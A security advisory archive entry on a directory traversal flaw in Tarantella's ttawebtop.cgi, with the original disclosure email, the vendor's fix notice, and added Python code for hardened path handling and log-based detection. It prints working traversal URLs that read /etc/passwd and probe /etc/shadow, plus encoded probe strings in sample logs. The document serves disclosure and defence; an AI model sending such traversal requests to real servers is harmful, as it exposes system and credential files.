SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Web Server/CGI)  >   Tarantella
Vendors:   Tarantella, Inc.
(Vendor Has Fixed This Issue) Re: Tarantella Application Web Server Discloses Files on the Server to Remote Users
SecurityTracker Alert ID:  1001782
SecurityTracker URL:  http://securitytracker.com/id/1001782
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 19 2001
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes
Vendor Confirmed:  Yes
Version(s): 3.00 and 3.01 only
Description:   A directory traversal vulnerability has been reported in the Tarantella application server that lets remote users retrieve files from anywhere on the server's filesystem, provided the file is readable by the account the web server runs as.

The vulnerability reportedly resides in the ttawebtop.cgi module, which accepts parent-directory ('../') components in its 'pg' parameter without rejecting them.

If a remote user issues a URL of the following form, the server returns the world-readable password file (/etc/passwd):

http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd

If a remote user attempts to retrieve a file that is not readable by the web server's account, the server returns a 'File missing' error page rather than a permission error, as shown below. Note that the error page echoes the constructed path, which confirms that the CGI prepends '/tarantella/' to the parameter and performs no normalisation or containment check before opening the file:

http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow

File missing

The following file could not be found:

/tarantella/../../../../../../../../../../../../../../../etc/shadow
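The following is an added example, not Tarantella's code: the page shows only the request and the echoed error path, so the way the CGI builds the filename is an assumed reconstruction of what the leaked string "/tarantella/../../../etc/shadow" implies. It puts the reported resolution beside a hardened one that normalises first and then refuses anything outside the webtop root. The root directory "/tarantella" and the page name "webtop/start.html" are assumptions used for illustration.

```python
import posixpath
import urllib.parse

# Added example, not Tarantella's code: the page shows only the request and the
# error text, so the prefixing below is an assumed reconstruction of what the
# leaked path "/tarantella/../../../etc/shadow" implies the CGI did.
WEBTOP_ROOT = "/tarantella"   # assumed directory the CGI serves pages from


def pg_from_query(query: str) -> str:
    """Extract the 'pg' parameter from a raw query string.

    parse_qs() decodes %XX escapes, so an encoded probe such as
    pg=%2e%2e%2fetc%2fpasswd is seen as ../etc/passwd before any path check."""
    params = urllib.parse.parse_qs(query, keep_blank_values=True)
    return params.get("pg", [""])[0]


def raw_join(root: str, pg: str) -> str:
    """Prefix the untrusted value with the root, as the error page shows.

    Plain concatenation (not os.path.join) is deliberate: os.path.join would
    let an absolute 'pg' such as /etc/passwd replace the root entirely."""
    return root + "/" + pg


def vulnerable_resolve(root: str, pg: str) -> str:
    """Reported behaviour: join, then let path normalisation collapse '..'.

    normpath() (like the kernel's path walk) stops at '/', so once the run of
    '../' is long enough to reach the root every extra '../' is discarded; an
    attacker can pad the request without knowing the real directory depth."""
    return posixpath.normpath(raw_join(root, pg))


def hardened_resolve(root: str, pg: str):
    """Normalise first, then refuse anything that does not stay under root.

    Returns the safe absolute path, or None for a rejected request.  The
    trailing '/' in the prefix test stops '../tarantella2/x' (a sibling whose
    name merely starts with 'tarantella') from passing."""
    candidate = posixpath.normpath(raw_join(root, pg))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    probe = "../" * 15 + "etc/passwd"
    print(raw_join(WEBTOP_ROOT, probe))            # the string the error page echoes
    print(vulnerable_resolve(WEBTOP_ROOT, probe))  # /etc/passwd
    print(hardened_resolve(WEBTOP_ROOT, probe))    # None
    print(hardened_resolve(WEBTOP_ROOT, "webtop/start.html"))
```

Two caveats for a real implementation: the containment check should be repeated on os.path.realpath() of the candidate, because a symlink inside the root can point outside it; and the rejection message should not echo the resolved path, since the page's own 'File missing' output shows how such an echo confirms the server's directory layout to the attacker.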

The vendor has reportedly been notified.

Impact:   A remote user can read any file located anywhere on the server that is readable by the account running the web server, such as world-readable files like /etc/passwd.
Solution:   The vendor states that this vulnerability was introduced in release 3.01, was caught during a security audit, and was fixed in the then-current release (Tarantella 3.10). Only releases 3.00 and 3.01 are reported to be vulnerable.

To fix this problem, the vendor recommends upgrading to 3.10.
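Until the upgrade is in place, the probes are easy to spot in web server access logs. The script below is an added example, not part of the advisory or of Tarantella's product: it parses Common Log Format lines, isolates requests to ttawebtop.cgi, and flags any 'pg' value that contains a '..' component or starts with '/' after decoding. It goes beyond the page by also decoding a second time, so a double-encoded probe (%252e) is caught; the page itself shows only the plain '../' form. The log lines, client addresses and status codes are constructed for the example; the page does not show the HTTP status of the 'File missing' page, and it is assumed here to be 200 to make the point that a 4xx-only filter would miss it.

```python
import re
import urllib.parse
from typing import Dict, List

# Constructed sample access-log lines (Common Log Format) for this example; they
# are not real traffic from the report.  The status codes are assumptions: the
# page shows a "File missing" page for the /etc/shadow probe but not its HTTP
# status, so that line is logged as 200 here.
SAMPLE_LOG = """\
203.0.113.9 - - [18/Jun/2001:13:06:41 -0400] "GET /tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../etc/passwd HTTP/1.0" 200 1842
203.0.113.9 - - [18/Jun/2001:13:07:02 -0400] "GET /tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.0" 200 311
203.0.113.9 - - [18/Jun/2001:13:07:40 -0400] "GET /tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=%252e%252e%252fetc%252fgroup HTTP/1.0" 200 297
198.51.100.4 - - [18/Jun/2001:13:09:15 -0400] "GET /tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=webtop/start.html HTTP/1.0" 200 9120
198.51.100.4 - - [18/Jun/2001:13:09:16 -0400] "GET /tarantella/images/logo.gif HTTP/1.0" 200 4020
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD target proto", status, size
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def decode_pg(query: str) -> str:
    """Return the 'pg' value with one extra round of %-decoding.

    parse_qs() already decodes once; the second unquote() catches a
    double-encoded probe (%252e -> %2e -> .) that a single-pass filter would
    let through.  A legitimate page name is unlikely to contain a literal '%'."""
    pg = urllib.parse.parse_qs(query, keep_blank_values=True).get("pg", [""])[0]
    return urllib.parse.unquote(pg)


def traversal_hits(log_text: str) -> List[Dict[str, str]]:
    """Flag ttawebtop.cgi requests whose decoded 'pg' leaves the webtop tree."""
    hits = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than fail
        url = urllib.parse.urlsplit(m["target"])
        if "ttawebtop.cgi" not in url.path:
            continue
        pg = decode_pg(url.query)
        # '..' as a whole path component, or an absolute path, is the signal;
        # a page name such as webtop/start.html contains neither.
        if ".." in pg.split("/") or pg.startswith("/"):
            hits.append({"ip": m["ip"], "ts": m["ts"], "pg": pg, "status": m["status"]})
    return hits


if __name__ == "__main__":
    for h in traversal_hits(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} status={h["status"]} pg={h["pg"]}')
```

Because the CGI answers a denied read with its own 'File missing' page, a status-code filter is not a reliable success signal; matching on the decoded parameter, as above, catches both the successful /etc/passwd read and the failed /etc/shadow probe from the report.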

Vendor URL:  www.tarantella.com/
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Caldera/SCO), Linux (Red Hat Linux), Linux (SuSE), Linux (Turbo Linux), UNIX (AIX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)

Message History:   This archive entry is a follow-up to the message listed below.
Jun 19 2001 Tarantella Application Web Server Discloses Files on the Server to Remote Users



 Source Message Contents

Subject:  Re: SCO Tarantella Remote file read via ttawebtop.cgi


On Monday June 18, KF wrote:
> SCO has been notified of this issue. 
> 
> 
> -------- Original Message --------
> Subject: SCO Tarantella Remote file read via ttawebtop.cgi
> Date: Mon, 18 Jun 2001 13:06:41 -0400
> From: KF <dotslash@snosoft.com>
> To: recon@snosoft.com
> 
> 
> http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
> 
> root:x:0:0:root:/root:/bin/bash
> bin:x:1:1:bin:/bin:
> daemon:x:2:2:daemon:/sbin:
> adm:x:3:4:adm:/var/adm:
> lp:x:4:7:lp:/var/spool/lpd:
> sync:x:5:0:sync:/sbin:/bin/sync
> shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
> halt:x:7:0:halt:/sbin:/sbin/
> ...
> 
> 
> No perms to shadow... 
> 
> http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow
> 
>  
> File missing
> 
> The following file could not be found:
> 
>                                               
> /tarantella/../../../../../../../../../../../../../../../etc/shadow
> 
>  Please give this information to a Tarantella Administrator.
> 
> -KF


This problem was introduced in release 3.01 and was caught during a security 
audit and was fixed for our last release (Tarantella 3.10).

It is a problem for releases 3.00 and 3.01 only.

To fix this problem upgrade to 3.10.

Thank you for reporting this problem.

 - Mike McEwen

Copyright 2020, SecurityGlobal.net LLC